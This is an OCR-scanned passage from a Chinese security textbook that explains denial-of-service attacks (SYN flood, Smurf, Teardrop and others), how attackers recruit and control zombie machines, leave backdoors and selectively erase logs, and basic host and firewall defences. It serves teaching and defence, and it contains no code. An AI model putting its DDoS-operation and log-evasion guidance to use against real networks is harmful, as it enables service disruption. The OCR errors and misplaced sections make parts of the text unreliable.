获得 其 所 需要 的 信息 服务 。 拒 绝 服务 器 DogS 攻击 的 对 象 是 Intemet 站 点 ， 对 大 部 分 网 站 的 
攻击 ， 并 未 入 侵 主机 系统 ， 也 没有 获取 其 中 资料 ， 而 是 利用 分 散在 不 同 地 方 的 多 台 计 算 机 ， 
发 送 大 量 伪造 源 地 址 IP 包 ， 使 受害 者 所 在 的 网 络 主机 瘫痪 ， 接 通 率 降 到 零 以 下 ， 使 服务 器 
无 法 对 正常 的 使 用 者 提供 服务 。 

DoS 攻击 的 基本 过 程 :首先 攻击 者 向 服务 器 发 送 众多 的 带 有 虚假 地 址 的 请 求 ， 服 务 器 
发 送 回 复 信息 后 等 待 回 传 信息 ， 由 于 地 址 是 伪造 的 ， 所 以 服务 器 一 直 等 不 到 回 传 的 消息 ， 
分 配给 这 次 请 求 的 资源 就 始终 没有 被 释放 。 当 服务 器 等 待 一 定 的 时 间 后 ， 连 接 会 因 超时 而 
被 切断 ， 攻 击 者 会 再 度 传送 新 的 一 批 请 求 ， 在 这 种 反复 发 送 伪 地 址 请 求 的 情况 下 ， 服 务 器 
资源 最 终 会 被 耗 尽 ， 从 而 导致 服务 器 服务 中 断 ， 如 图 3-1 所 示 。 
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3-1 DoS 攻击 的 基本 过 程 
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3.1.2 ”拒绝 服务 攻击 的 分 类 


近 些 年 来 ， 随 着 人 们 不 断 加强 对 DoS 的 防御 ， 设 计 出 各 种 应 对 DoS 攻击 的 技术 手段 ， 
同时 ，Dos 攻击 的 手段 也 在 不 断 地 变化 、 增 多 ， 即 使 是 同一 种 攻击 方式 ， 攻 击 者 改变 某 些 
攻击 特征 ， 就 可 以 躲 过 某 些 防 御 措 施 ， 从 而 衍生 出 各 种 各 样 的 DoS 攻击 模式 。 这 些 问题 ， 
一 方面 阻碍 了 研究 者 对 攻击 现象 与 特征 的 深入 理解 ， 另 一 方面 ， 也 对 人 们 根据 攻击 特征 的 
异同 来 实施 不 同 的 防御 手段 ， 并 对 防御 措施 的 有 效 性 进行 评估 带 来 了 困难 。 

如 果 了 解 了 攻击 者 可 以 采取 的 攻击 类 型 ， 就 可 以 有 针对 性 地 应 对 这 些 攻击 。 而 对 拒绝 
服务 攻击 的 分 类 研究 则 是 深入 了 解 拒绝 服务 攻击 的 有 效 途 径 。 因 此 ， 本 节 讨论 对 拒绝 服务 
攻击 的 分 类 。 

拒绝 服务 攻击 的 分 类 方法 有 很 多 种 ， 从 不 同 的 角度 可 以 进行 不 同 的 分 类 ， 而 不 同 的 应 
用 场合 需要 采用 不 同 的 分 类 。 

(1) 拒绝 服务 攻击 可 以 是 物理 的 (硬件 的 ), 也 可 以 是 逻辑 的 (Logic Attack), 也 称 为 软件 
的 (Software Attack)。 物 理 形式 的 攻击 如 偷窃 、 破 坏 物 理 设备 ， 破 坏 电源 等 。 物 理 攻 击 属于 
物理 安全 的 范围 ， 不 在 本 书 的 讨论 之 列 。 本 书 中 只 讨论 后 一 种 形式 的 攻击 。 

(2) 按 攻击 的 目标 又 可 分 为 节点 型 和 网 络 连接 型 ， 前 者 旨 在 消耗 节点 (主机 Host) 资 源 ， 
后 者 旨 在 消耗 网 络 连接 和 带宽 。 而 节点 型 又 可 以 进一步 细 分 为 主机 型 和 应 用 型 ， 主 机 型 攻 
击 的 目标 主要 是 主机 中 的 公共 资源 如 CPU、 磁 盘 等 ， 使 得 主机 对 所 有 的 服务 都 不 能 响应 ， 
而 应 用 型 则 是 攻击 特定 的 应 用 ， 如 邮件 服务 、DNS 服务 、Web 服务 等 。 受 攻击 时 ， 受 害 者 
上 的 其 他 服务 可 能 不 受 影响 或 者 受 影响 的 程度 较 小 (与 受 攻击 的 服务 相 比 而 言 )。 

(3) 按照 攻击 方式 可 以 分 为 资源 消耗 、 服 务 中 止 和 物理 破坏 。 资 源 消耗 指 攻击 者 试图 
消耗 目标 的 合法 资源 ， 例 如 网 络 带宽 、 内 存 和 磁盘 空间 、CPU 使 用 率 等 。 服 务 中 止 则 是 指 
攻击 者 利用 服务 中 的 某 些 缺陷 导致 服务 崩溃 或 中 止 。 物 理 破坏 则 是 指 雷击 、 电 流 、 水 火 等 
物理 接触 的 方式 导致 的 拒绝 服务 攻击 。 

(4) 按 受害 者 类 型 可 以 分 为 服务 器 端 拒绝 服务 攻击 和 客户 端 拒绝 服务 攻击 。 前 者 是 指 
攻击 的 目标 是 特定 的 服务 器 ， 使 之 不 能 提供 服务 (或 者 不 能 向 某 些 客户 端 提供 某 种 服务 )， 
例如 攻击 一 个 Web 服务 器 使 之 不 能 被 访问 ; 后 者 是 针对 特定 的 客户 端 即 用 户 ， 使 之 不 能 使 
用 某 种 服务 ， 例 如 游戏 和 聊天 室 中 的 “ 踢 人 ”， 即 不 让 某 个 特定 的 用 户 登 录 游 戏 系统 或 聊 
天 室 中 ， 使 之 不 能 使 用 系统 的 服务 。 大 多 数 的 拒绝 服务 攻击 (无 论 从 种 类 还 是 发 生 的 频率 角 
度 ) 是 针对 服务 器 的 ， 针 对 客户 端的 攻击 一 般 发 生得 少 些 ， 同 时 因为 涉及 面 小 ， 其 危害 也 会 
小 很 多 。 

(5) 按 攻击 是 否 直 接 针对 受害 者 ， 可 以 分 为 直接 拒绝 服务 攻击 和 间接 拒绝 服务 攻击 ， 
如 要 对 某 个 E-mail 账号 实施 拒绝 服务 攻击 , 直接 对 该 账号 用 邮件 炸弹 攻击 就 属于 直接 攻击 。 
为 了 使 某 个 邮件 账号 不 可 用 ， 攻 击 邮 件 服务 器 而 使 整个 邮件 服务 器 不 可 用 就 是 间接 攻击 。 

(6) 按 攻 击 地 点 可 以 分 为 本 地 攻击 和 远程 (网 络 ) 攻 击 ， 本 地 攻击 是 指 不 通过 网 络 ， 直 
接 对 本 地 主机 的 攻击 ， 远 程 攻击 则 必须 通过 网 络 连 接 。 由 于 本 地 攻击 要 求 攻击 者 与 受害 者 
处 于 同一 地 ， 这 对 攻击 者 的 要 求 太 高 ， 通 常 只 有 内 部 人 员 能 够 做 到 。 同 时 ， 本 地 攻击 通常 
可 以 通过 物理 安全 措施 以 及 对 内 部 人 员 的 严格 控制 予以 解决 。 


中 萝 了 章 ， 因 纺 饥 务 与 塌 多 库 安全 


3.1.3 常见 DoS 攻击 


攻击 者 进行 拒绝 服务 攻击 ， 实 际 上 是 让 服务 器 实现 两 种 效果 : 一 是 迫使 服务 器 的 缓冲 
区 满 ， 不 接收 新 的 请 求 ， 二 是 使 用 他 欺骗， 迫使 服务 器 把 合法 用 户 的 连接 复位 ， 影 响 合法 
用 户 的 连接 。 

拒绝 服务 攻击 是 一 种 对 网 络 危 害 巨 大 的 恶意 攻击 。 今 天 ，DoS 具有 代表 性 的 攻击 手段 
包括 SYN flood、IP 欺骗 DoS、Ping of Death、TearDrop、UDP flood 、Land Attack、Smnurf 
等 。 我 们 看 看 它们 又 是 怎么 实现 的 。 


1. SYN 洪水 ( SYN flood ) 


SYN flood 是 当前 最 流行 的 DoS( 拒 绝 服务 攻击 ) 与 DDoS( 分 布 式 拒绝 服务 攻击 ) 的 方式 
之 一 ， 这 是 一 种 利用 TCP 协议 缺陷 ， 发 送 大 量 伪造 的 TCP 连接 请 求 ， 从 而 使 得 被 攻击 方 
资源 耗 尽 (CPU 满 负荷 或 内 存 不 足 ) 的 攻击 方式 。 

SYN flood 攻击 的 过 程 在 TCP 协议 中 被 称 为 三 次 握手 ， 而 SYN flood 拒绝 服务 攻击 就 
是 通过 三 次 握手 来 实现 的 。 

(1) 攻击 者 向 被 攻击 服务 器 发 送 一 个 包含 SYN 标识 的 TCP 报 文 ，SYN 即 同 步 报 文 。 
同步 报 文 会 指明 客户 端 使 用 的 端口 以 及 TCP 连接 的 初始 序号 , 这 时 同 被 攻击 服务 器 建立 了 
第 一 次 握手 。 

(2) 被 攻击 服务 器 在 收 到 攻击 者 的 SYN 报 文 后 ， 将 返回 一 个 SYN+ACK 的 报 文 ， 表 
示 攻 击 者 的 请 求 被 接受 ， 同 时 TCP 序号 被 加 一 。ACK 即 确认 ， 这 样 就 同 被 攻击 服务 器 建 
立 了 第 二 次 握手 。 

(3) 攻击 者 也 返回 一 个 确认 报 文 ACK 给 被 攻击 服务 器 ， 同 样 TCP 序号 被 加 一 ， 到 此 
一 个 TCP 连接 完成 ， 三 次 握手 完成 。 

具体 原理 是 : 在 TCP 连接 的 三 次 握手 中 ， 假 设 一 个 用 户 向 服务 器 发 送 了 SYN 报 文 后 
突然 死机 或 掉 线 ， 那 么 服务 器 在 发 出 SYN+ACK 应 答 报 文 后 是 无 法 收 到 客户 端的 ACK 报 
文 的 (第 三 次 握手 无 法 完成 )， 这 种 情况 下 服务 器 端 一 般 会 重 试 (再 次 发 送 SYN+ACK 给 客户 
端 ) 并 等 待 一 段 时间 后 丢弃 这 个 未 完成 的 连接 ， 这 段 时 间 的 长 度 被 称 为 SYN Timeout， 一 般 
来 说 这 个 时 间 是 分 钟 的 数量 级 (为 30 秒 一 2 分 钟 ); 一 个 用 户 出 现 异 常 导致 服务 器 的 一 个 线 
程 等 待 1 分 钟 并 不 是 很 大 的 问题 ， 但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 这 种 情况 ， 服 务 器 
端 将 为 了 维护 一 个 非常 大 的 半 连 接 列 表 而 消耗 非常 多 的 资源 一 数 以 万 计 的 半 连 接 ， 即 使 
是 简单 的 保存 并 遍历 也 会 消耗 非常 多 的 CPU 时 间 和 内 存 , 何况 还 要 不 断 对 这 个 列表 中 的 卫 
进行 SYN+ACK 的 重 试 。 实 际 上 如 果 服 务 器 的 TCP/IP 栈 不 够 强大 ， 最 后 的 结果 往往 是 堆 
栈 溢 出 崩溃 一 一 即使 服务 器 端的 系统 足够 强大 ， 服 务 器 端 也 将 忙于 处 理 攻 击 者 伪造 的 TCP 
连接 请 求 而 无 暇 理 皮 客户 的 正常 请 求 (毕竟 客户 端的 正常 请 求 比率 非常 之 小 )， 此 时 从 正常 
客户 的 角度 看 来 , 服务 器 失去 响应 , 这 种 情况 被 称 作 “服务 器 端 受 到 了 SYN flood 攻击 (SYN 
洪水 攻击 )”。 


2. IP 欺骗 DoS 
这 种 攻击 利用 RST 位 来 实现 。 假 设 现在 有 一 个 合法 用 户 (61.61.61.61) 已 经 同 服务 器 建 
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立 了 正常 的 连接 ,攻击 者 构造 攻击 的 TCP 数据 ， 伪 装 自己 的 下 为 : 61.61.61.61， 并 向 服务 
器 发 送 一 个 带 有 RST 位 的 TCP 数据 段 。 服 务 器 接收 到 这 样 的 数据 后 ， 认 为 从 61.61.61.61 
发 送 的 连接 有 错误 ， 就 会 清空 缓冲 区 中 建立 好 的 连接 。 这 时 ， 如 果 合 法 用 户 61.61.61.61 再 
发 送 合法 数据 ， 服 务 器 就 已 经 没有 这 样 的 连接 了 ， 该 用 户 就 必须 重新 开始 建立 连接 。 攻 击 
时 ， 攻 击 者 会 伪造 大 量 的 人 P 地 址 ， 向 目标 发 送 RST 数据 ， 使 服务 器 不 对 合法 用 户 服务 ， 
从 而 实现 了 对 受害 服务 器 的 拒绝 服务 攻击 。 


3. 死亡 之 Ping (Ping of Death ) 


ICMP 在 Internet 上 用 于 错误 处 理 和 传递 控制 信息 。 它 的 功能 之 一 是 与 主机 联系 ， 通 过 
发 送 一 个 “回音 请 求 ”(echo requesb 信 息 包 看 看 主机 是 否 “活着 ”。 最 普通 的 ping 程序 就 
是 这 个 功能 。 而 在 TCP/IP 的 RFC 文档 中 对 包 的 最 大 尺寸 都 有 严格 限制 规定 ， 许 多 操作 系 
统 的 TCP/IP 协议 栈 都 规定 ICMP 包 大 小 为 64KB， 且 在 对 包 的 标题 头 进行 读 取 之 后 ， 要 根 
据 该 标题 头 里 包含 的 信息 来 为 有 效 载荷 生成 缓冲 区 。Ping of Death 就 是 故意 产生 畸形 的 
测试 Ping(Packet Internet Groper) 包 ， 声 称 自己 的 尺寸 超过 ICMP 上 限 ， 也 就 是 加 载 的 尺寸 
超过 64KB 上 限 ， 使 未 采取 保护 措施 的 网 络 系统 出 现 内 存 分 配 错误 ， 导 致 TCP/IP 协议 栈 骨 
溃 ， 最 终 会 造成 接收 方 主机 死机 。 


4. 泪 滴 ( TearDrop) 攻击 


泪 滴 攻 击 利用 在 TCP/IP 协议 栈 实现 中 信任 下 碎片 中 的 包 的 标题 头 所 包含 的 信息 来 实 
现 自己 的 攻击 。IP 分 段 含 有 指示 该 分 段 所 包含 的 是 原 包 的 哪 一 段 的 信息 , 某 些 TCP/IP 协议 
栈 (例如 : NT 在 service pack 4 以 前 ) 在 收 到 含有 重 登 偏 移 的 伪造 分 段 时 将 崩溃 。UDP 洪 
水 (UDP flood) :如 今 在 mtermet 上 UDP( 用 户 数 据 包 协议 ) 的 应 用 比较 广泛 ,很 多 提供 WWW 
和 Mail 等 服务 的 设备 通常 是 使 用 UNIX 的 服务 器 ， 它 们 默认 打开 一 些 被 黑客 恶意 利用 的 
UDP 服务 。 如 echo 服务 会 显示 接收 到 的 每 一 个 数据 包 ， 而 原本 作为 测试 功能 的 chargen 服 
务 会 在 收 到 每 一 个 数据 包 时 随机 反馈 一 些 字符 。UDP flood 假冒 攻击 就 是 利用 这 两 个 简单 
的 TCP/IP 服务 的 漏洞 进行 恶意 攻击 ， 通 过 伪造 与 某 一 主机 的 Chargen 服务 之 间 的 一 次 
的 UDP 连接 , 回复 地 址 指向 开 着 Echo 服务 的 一 台 主机 , 通过 将 Chargen 和 Echo 服务 互 指 ， 
来 回 传送 毫 无 用 处 且 占 满 带 宽 的 垃圾 数据 ， 在 两 台 主 机 之 间 生 成 足够 多 的 无 用 数据 流 ， 这 
一 拒绝 服务 攻击 飞快 地 导致 网 络 可 用 带宽 耗 尽 。 

5. UDP flood 攻击 

UDP 淹没 攻击 是 导致 基于 主机 的 服务 拒绝 攻击 的 一 种 。UDP 是 一 种 无 连接 的 协议 ， 
而 且 它 不 需要 用 任何 程序 建立 连接 来 传输 数据 。 当 攻击 者 随机 地 向 受害 系统 的 端口 发 送 
UDP 数据 包 的 时 候 ， 就 可 能 发 生 了 UDP 淹没 攻击 。 当 受害 系统 接收 到 一 个 UDP 数据 包 的 
时 候 ， 它 会 确定 目的 端口 正在 等 待 中 的 应 用 程序 。 当 它 发 现 该 端口 中 并 不 存在 正在 等 待 的 
应 用 程序 ， 它 就 会 产生 一 个 目的 地 址 无 法 连接 的 ICMP 数据 包 发 送 给 该 伪造 的 源 地 址 。 如 
果 向 受害 者 计算 机 端口 发 送 了 足够 多 的 UDP 数据 包 的 时 候 ， 整 个 系统 就 会 瘫痪 。 

6. Land (Land Attack) 攻 击 


在 Land 攻击 中 ， 黑 客 利 用 一 个 特别 打造 的 SYN 包 


它 的 原 地 址 和 目标 地 址 都 被 设 


中 由 佣 3 蓝 友 纺 掏 多 与 并 谨 话 入 全 


置 成 某 一 个 服务 器 地 址 进行 攻击 。 此 举 将 导致 接收 服务 器 向 它 自己 的 地 址 发 送 SYN-ACK 
消息 , 结果 这 个 地 址 又 发 回 ACK 消息 并 创建 一 个 空 连接 , 每 一 个 这 样 的 连接 都 将 保留 直到 
超时 ， 在 Land 攻击 下 ， 许 多 UNIX 将 崩溃 ，NT 变 得 极其 缓慢 (大 约 持续 5 分 钟 )。 


7. Smurf 攻击 


Smurf 攻击 是 以 最 初 发 动 这 种 攻击 的 程序 名 “Smurf” 来 命名 的 。 这 种 攻击 方法 结合 
用 了 下 欺骗 和 ICMP 回复 方法 使 大 量 网 络 传输 充斥 目标 系统 ,引起 目标 系统 拒绝 为 正常 系 
统 进行 服务 。Smurf 攻击 通过 使 用 将 回复 地 址 设置 成 受害 网 络 的 广播 地 址 的 ICMP 应 答 请 
求 (ping) 数 据 包 ,来 淹没 受害 主机 ， 最 终 导 致 该 网 络 的 所 有 主机 都 对 此 ICMP 应 答 请 求 做 出 
答复 ， 导 致 网 络 阻塞 。 更 加 复杂 的 Smurf 将 源 地 址 改 为 第 三 方 的 受害 者 ， 最 终 导致 第 三 方 


3.1.4 ”分 布 式 拒绝 服务 


分 布 式 拒绝 服务 攻击 DDoS(Distributed Denial of Service) 是 对 传统 拒绝 服务 攻击 的 发 
展 ,攻击 者 向 网 络 服务 器 发 起 众多 携带 非法 人 P 地 址 的 服务 请 求 ， 服 务 器 在 回复 该 请 求 后 进 
入 等 待 客户 端 回 传 消息 的 状态 。 由 于 上 述 人 P 地 址 是 人 为 伪造 的 ， 服 务 器 一 般 不 会 等 到 所 需 
要 的 回应 对 话 ， 因 此 分 配给 该 次 请 求 的 系统 资源 就 始终 没有 正常 释放 。 当 然 ， 在 服务 器 等 
待 一 定时 间 后 ， 网 络 连接 会 因为 超时 而 被 强制 切断 ， 此 时 攻击 者 会 发 送 新 一 轮 的 服务 请 求 ， 
在 这 种 周期 性 发 起 的 非法 IP 地 址 请 求 的 作用 下 ， 服 务 器 资源 最 终 会 被 完全 耗 尽 ， 如 图 3-2 
所 示 。 


mm mm Ci nfm Por 


3-2 ”典型 的 DDoS 攻击 示意 图 


一 般 来 说 ， 分 布 式 拒绝 服务 攻击 DDoS 攻击 通常 会 经 过 三 个 步骤 : @ 搜 集 了 解 攻击 目 
标的 具体 情况 ; @ 占 领 控制 和 攻击 倪 偶 机 ; @ 实 施 分 布 式 拒 绝 服务 攻击 。 相对 完善 的 DDoS 
攻击 体系 大 致 可 以 分 成 四 大 部 分 : 黑客 (IntrudeD 、 控 制 机 (MasteD 、 攻 击 机 (Daemon) 和 受害 
者 (Victims)。 其 中 前 三 部 分 组 成 上 述 体系 结构 中 的 攻击 发 起 和 实施 部 分 。 

先 来 看 一 下 最 重要 的 控制 机 和 攻击 机 ， 它 们 分 别 用 作 控 制 和 实际 发 起 攻击 。 请 注意 控 
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制 机 与 攻击 机 的 区 别 ， 对 受害 者 来 说 ，DDoS 的 实际 攻击 包 是 受害 者 攻击 侈 偏 机 时 发 出 的 ， 
控制 机 只 发 布 命令 而 不 参与 实际 的 攻击 。 对 控制 机 和 攻击 机 ， 黑 客 有 控制 权 或 者 是 部 分 的 
控制 权 ， 并 把 相应 的 DDoS 程序 上 传 到 这 些 平台 上 ， 这 些 程序 与 正常 的 程序 一 样 运行 并 等 
待 来 自 黑客 的 指令 ， 通 常 它 还 会 利用 各 种 手段 隐藏 自己 ， 不 被 别人 发 现 。 在 平时 ， 这 些 倪 
伟 机 器 并 没有 什么 异常 ， 只 是 一 旦 黑客 连接 到 它们 进行 控制 ， 并 发 出 指令 的 时 候 ， 攻 击 侈 
偶 机 就 成 为 害 人 者 去 发 起 攻击 了 。 

为 什么 黑客 不 直接 去 控制 攻击 机 ， 而 要 从 控制 侈 偏 机 上 转 一 下 呢 ? 因 为 这 样 可 以 使 
DDoS 攻击 难以 追查 。 从 攻击 者 的 角度 来 说 ， 肯 定 不 愿意 被 捉 到 ， 而 攻击 者 使 用 的 倪 偶 机 
越 多 ， 他 实际 上 提供 给 受害 者 的 分 析 依据 就 越 多。 在 占领 一 台 机 器 后 ， 高 水 平 的 攻击 者 会 
首先 做 两 件 事 : 一 是 考虑 如 何 留 好 后 门 ， 二 是 如 何 清理 日 志 。 这 就 是 擦 掉 脚印 ， 不 让 自己 
做 的 事 被 别人 察觉 到 。 比 较 不 敬业 的 黑客 会 把 日 志 全 都 删 掉 ， 如 果 这 样 ， 网 管 员 发 现 日 志 
都 没 了 就 会 知道 有 人 干 了 坏事 ， 顶 多 是 无 法 从 日 志 中 发 现 是 谁 干 的 而 已 。 相 反 ， 真 正 的 好 
手 会 挑 与 自己 有 关 的 日 志 项 目 删 掉 ， 让 人 看 不 到 异常 的 情况 。 这 样 可 以 长 时 间 地 利用 倪 偶 
机 。 但 是 清理 攻击 机 上 的 日 志 确 实 是 一 项 繁重 的 任务 ， 即 使 在 有 很 好 的 日 志清 理工 具 的 帮 
助 下 ， 黑 客 也 是 对 这 个 任务 很 头痛 的 。 这 就 导致 了 有 些 攻击 机 的 日 志清 理 得 不 是 很 干净 ， 
通过 它 上 面 的 线索 找到 了 控制 它 的 上 一 级 计算 机 ， 这 上 一 级 的 计算 机 如 果 是 黑客 自己 的 机 
器 ， 那 么 他 就 会 被 揪 出 来 了 。 但 如 果 这 是 控制 用 的 侈 偶 机 的 话 ， 黑 客 自身 还 是 安全 的 。 控 
制 倪 伟 机 的 数目 相对 很 少 ， 一 般 一 台 可 以 控制 几 十 台 攻 击 机 ， 清 理 一 台 计 算 机 的 日 志 对 黑 
客 来 讲 就 轻松 多 了 ， 这 样 从 控制 机 再 找到 黑客 的 可 能 性 也 大 大 降低 了 。 

被 DDoS 攻击 时 的 现象 如 下 。 

(1) 被 攻击 主机 上 有 大 量 等 待 的 TCP 连接 。 

(2) 网 络 中 充斥 着 大 量 的 无 用 数据 包 ， 源 地 址 为 假 的 。 

(3) 制造 高 流量 无 用 数据 ， 造 成 网 络 拥塞 ， 使 受害 主机 无 法 正常 和 外 界 通联 系 。 

(4) 利用 受害 主机 提供 的 服务 或 传输 协议 上 的 缺陷 , 反复 高 速 地 发 出 特定 的 服务 请 求 ， 
使 受害 主机 无 法 及 时 处 理 所 有 正常 请 求 。 

(5) 严重 时 会 造成 系统 死机 。 

那么 黑客 是 如 何 组 织 一 次 DDoS 攻击 的 ? 这 里 用 “组 织 ” 这 个 词 ， 是 因为 DDoS 并 不 
像 入 侵 一 台 主 机 那样 简单 。 一 般 来 说 ， 黑 客 进 行 DDoS 攻击 时 会 经 过 下 面 的 步骤 。 

ID) “搜集 了 解 目标 的 情况 

下 列 情况 是 黑客 非常 关心 的 情报 。 

(1) 被 攻击 目标 主机 数目 、 地 址 情况 。 

(2) 目标 主机 的 配置 、 性 能 。 

(3) 目标 的 带宽 。 

对 于 DDoS 攻击 者 来 说 ， 攻 击 Intermet 上 的 某 个 站 点 ， 如 http://www.mytarget.com， 重 
点 是 要 确定 到 底 有 多 少 台 主机 在 支持 这 个 站 点 ， 一 个 大 的 网 站 可 能 有 很 多 台 主 机 利用 负载 
均衡 技术 为 其 提供 相同 的 www 服务 。 以 http://www. mytarget.com 为 例 ， 下 列 地 址 都 是 提 
供 http:/www. mytarget.com 服务 的 : 

82.218.71.87 

82.218.71.88 


MEED EE 


82.218.71.89 
82.218.71.80 
82.218.71.81 
82.218.71.83 
82.218.71.84 
82.218.71.86 
如 果 要 进行 DDoS 攻击 的 话 ， 应 该 攻击 哪 一 个 地 址 呢 ? 使 82.218.71.87 这 台 机 器 瘫 掉 ， 


但 划 


他 的 主机 还 是 能 向 外 提供 www 服务 , 所 以 想 让 别人 访问 不 到 http://www. mytarget.com 


的 话 ， 必 须 是 所 有 这 些 人 P 地 址 的 机 器 都 竣 掉 才 行 。 在 实际 的 应 用 中 ， 一 个 卫 地 址 往往 还 
代表 着 数 台 机 器 : 网 站 维护 者 使 用 了 四 层 或 七 层 交换 机 来 做 负载 均衡 ,把 对 一 个 他 地 址 的 
访问 以 特定 的 算法 分 配 到 下 属 的 每 个 主机 上 去 。 这 时 对 于 DDoS 攻击 者 来 说 情况 就 更 复杂 


es 


他 面 对 的 任务 可 能 是 让 几 十 台 主 机 的 服务 都 不 正常 。 
所 以 说 事先 搜集 情报 对 DDoS 攻击 者 来 说 是 非常 重要 的 ， 这 关系 到 使 用 多 少 台 倪 偶 机 


才能 达到 效果 的 问题 。 简 单 地 考虑 一 下 ， 在 相同 的 条 件 下 ， 攻 击 同一 站 点 的 两 台 主 机 需要 
两 台 倪 偶 机 的 话 ， 攻 击 5 台 主机 可 能 就 需要 5 台 以 上 的 倪 偶 机 。 有 人 说 做 攻击 的 倪 偶 机 越 
多 越 好 ， 不 管用 户 有 多 少 台 主机 我 们 都 用 尽量 多 的 倪 介 机 来 攻击 就 是 了 ， 反 正 参 与 攻击 的 
倪 偶 机 越 多 效果 就 更 好 。 


但 在 实际 过 程 中 ， 有 很 多 黑客 并 不 进行 情报 的 搜集 而 直接 进行 DDoS 的 攻击 ， 这 时 候 


攻击 的 盲目 性 就 很 大 了 ， 效 果 如 何 也 要 靠 运气 。 其 实 做 黑客 也 像 网 管 员 一 样 ， 是 不 能 偷懒 


的 。 


一 件 事 做 得 好 与 坏 ， 态 度 最 重要 ， 水 平 还 在 其 次 。 

2) 占领 倪 偶 机 

黑客 最 感 兴趣 的 主机 有 下 列 几 种 。 

(1) 链 路 状态 好 的 主机 。 

(2) 性 能 好 的 主机 。 

(3) 安全 管理 水 平 差 的 主机 。 

这 一 部 分 实际 上 是 使 用 了 另 一 大 类 的 攻击 手段 : 利用 形 攻击 。 这 是 和 DDoS 并 列 的 攻 


击 方式 。 简 单 地 说 ， 就 是 占领 和 控制 被 攻击 的 主机 ， 取 得 最 高 的 管理 权限 ， 或 者 至 少 得 到 
一 个 有 权限 完成 DDoS 攻击 任务 的 账号 。 对 于 一 个 DDoS 攻击 者 来 说 ， 准 备 好 一 定数 量 的 
倪 偶 机 是 一 个 必要 的 条 件 ， 下 面 说 一 下 攻击 者 是 如 何 攻击 并 占领 它们 的 。 


首先 ， 黑客 做 的 工作 一 般 是 扫描 ， 随 机 地 或 者 是 有 针对 性 地 利用 扫描 器 去 发 现 Internet 


上 那些 有 漏洞 的 机 器 ， 像 程序 的 溢出 漏洞 、 公 共 网 关 接口 、 统 一 码 、 事 件 传输 协议 、 数 据 
库 漏洞 ……( 简 直 不 胜 枚 举 )， 都 是 黑客 希望 看 到 的 扫描 结果 。 随 后 就 是 尝 斌 入侵， 具体 的 
手段 可 以 到 网 上 查阅 相关 文章 了 解 。 


黑客 占领 一 台 倪 候 机 后 , 做 上 面 说 过 的 留 后 门 、 探 脚印 这 些 基本 工作 之 外 , 会 把 DDoS 


攻击 用 的 程序 上 传 过 去 , 一 般 是 利用 名 来 完成 的 。 在 攻击 机 上 , 会 有 一 个 DDoS 的 发 包 程 


序 ， 


黑客 就 是 利用 它 来 向 受害 目标 发 送 恶 意 攻 击 包 的 。 
3) ”实际 攻击 
经 过 前 两 个 阶段 的 精心 准备 之 后 ， 黑 客 就 开始 瞄准 目标 准备 发 射 了 。 前 面 的 准备 做 得 


4 话 ， 实 际 攻击 过 程 反 而 是 比较 简单 的 。 如 图 3-2 所 示 ， 黑 客 登录 到 作为 控制 台 的 倪 偶 
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机 ， 向 所 有 的 攻击 机 发 出 命令 。 这 时 候 在 攻击 机 中 的 DDoS 攻击 程序 就 会 响应 控制 台 的 命 
令 ， 一 起 向 受害 主机 以 高 速度 发 送 大 量 的 数据 包 ， 导 致 它 死机 或 是 无 法 响应 正常 的 请 求 。 
黑客 一 般 会 以 远 远 超 出 受害 方 处 理 能 力 的 速度 进行 攻击 。 

有 经 验 的 攻击 者 一 边 攻击 ， 还 会 用 各 种 手段 来 监视 攻击 的 效果 ， 在 需要 的 时 候 进 行 一 
些 调整 。 简 单 些 就 是 开 个 窗口 不 断 地 Ping 目标 主机 ， 在 能 接 到 回应 的 时 候 就 再 加 大 一 些 流 
量 或 是 再 命令 更 多 的 佛 偶 机 来 加 入 攻击 。 


3.1.5 ”拒绝 服务 攻击 的 防护 


尽管 多 年 来 全 球 无 数 网 络 安全 专家 都 在 着 力 开发 DoS 攻击 的 解决 办 法 , 但 到 目前 为 止 
收效 不 大 , 这 是 因为 Dos 攻击 利用 了 TCP 协议 本 身 的 弱点 。 DoS 攻击 使 用 相对 简单 的 攻击 
方法 ， 可 以 使 目标 系统 完全 瘫痪 ， 甚 至 破坏 整个 网 络 。 因 此 Extreme Networks 认为 ， 只 有 
从 网 络 的 全 局 着 眼 ， 在 网 间 基 础 设施 的 各 个 层面 上 采取 应 对 措施 ， 包 括 在 局 域 网 层面 上 采 
用 特殊 措施 ， 及 在 网 络 传输 层面 上 进行 必要 的 安全 设置 ， 并 安装 专门 的 Dos 识别 和 预防 工 
具 ， 才 能 最 大 限度 地 减少 DoS 攻击 所 造成 的 损失 。 

不 过 即使 它 难以 防范 ， 我 们 也 不 应 该 坐 以 待 毙 ， 实 际 上 防止 DoS 并 不 是 绝对 不 可 行 的 
事情 。 互 联网 的 使 用 者 是 各 种 各 样 的 ， 与 DoS 作 斗 争 ， 不 同 的 角色 有 不 同 的 任务 。 下 面 列 
出 了 几 种 典型 的 角色 。 

(1) 企业 网 管理 员 。 

(2) SP、ICP 管理 员 。 

(3) 骨干 网 络 运营 商 。 

(4) 企业 网 管理 员 。 

网 管 员 作为 一 个 企业 内 部 网 的 管理 者 ， 往 往 也 是 安全 员 、 守 护 神 。 在 他 维护 的 网 络 中 
有 一 些 服务 器 需要 向 外 提供 www 服务 ， 因 而 不 可 避免 地 成 为 DogS 的 攻击 目标 ， 他 该 如 何 
做 呢 ? 可 以 从 主机 与 网 络 设备 两 个 角度 去 考虑 。 

1. 主机 上 的 设置 


几乎 所 有 的 主机 平台 都 有 抵御 DoS 的 设置 ， 总 结 一 下 ， 主 要 有 以 下 几 种 。 
(1) 关闭 不 必要 的 服务 。 

(2) 限制 同时 打开 的 Syn 半 连 接 数目 。 

(3) 缩短 Syn 半 连 接 的 time out 时 间 。 

(4) 及 时 更 新 系统 补丁 。 


2. 网 络 设备 上 的 设置 


企业 网 的 网 络 设备 可 以 从 防火 墙 与 路 由 器 上 考虑 。 这 两 个 设备 是 连接 外 界 的 接口 设备 ， 
在 进行 防 DoS 设置 的 同时 ， 要 注意 一 下 这 是 以 多 大 的 效率 牺牲 为 代价 的 ， 对 用 户 来 说 这 是 
否 值得 。 

1) ”防火墙 

(1) 禁止 对 主机 的 非 开放 服务 的 访问 。 

(2) 限制 同时 打开 的 Syn 最 大 连接 数 。 
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(3) 限制 特定 人 P 地 址 的 访问 。 

(4) 启用 防火 墙 的 防 DDoS 的 属性 。 

(5) 严格 限制 对 外 开放 的 服务 器 的 向 外 访问 。 

